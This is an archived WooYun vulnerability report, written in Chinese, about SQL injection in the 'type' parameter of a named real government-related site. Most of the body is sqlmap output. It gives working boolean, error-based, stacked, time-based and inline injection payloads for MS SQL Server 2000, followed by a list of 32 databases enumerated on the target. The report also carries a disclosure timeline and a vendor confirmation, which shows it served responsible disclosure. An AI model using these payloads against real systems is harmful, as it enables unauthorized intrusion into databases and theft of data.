乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-03: 细节已通知厂商并且等待厂商处理中 2015-03-03: 厂商已经确认,细节仅向厂商公开 2015-03-13: 细节向核心白帽子及相关领域专家公开 2015-03-23: 细节向普通白帽子公开 2015-04-02: 细节向实习白帽子公开 2015-04-17: 细节向公众公开
某地方的一枚注射
注入点:
http://jmoa.183.gd.cn/zhenghe/AnnounceMore.aspx?type=1
上神器sqlmap...
---Place: GETParameter: type Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=1 AND 2068=2068 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: type=1 AND 5056=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(103)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN (5056=5056) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(103)+CHAR(108)+CHAR(115)+CHAR(113))) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: type=1; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: type=1 WAITFOR DELAY '0:0:5'-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: type=(SELECT CHAR(113)+CHAR(119)+CHAR(103)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN (1630=1630) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(103)+CHAR(108)+CHAR(115)+CHAR(113))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000
内容还是不错的
数据库:available databases [32]:[*] beifen[*] bkbb[*] BussClientMng[*] cangku[*] card_show[*] cgshp[*] chuhui[*] cqzq_bkbb[*] db_Examination[*] hr[*] jiangmen[*] JM183DB[*] JMCLGL[*] jmluntan[*] jmmzk[*] jmoa[*] master[*] model[*] msdb[*] newcangku[*] newyearcard[*] Northwind[*] photo[*] pubs[*] stamps[*] SuDi_Rydd[*] tempdb[*] tsclub[*] wangdian[*] ywxc[*] ywxc_OA[*] zhenghe
已证明!
你们来吧
危害等级:中
漏洞Rank:5
确认时间:2015-03-03 13:24
谢谢
暂无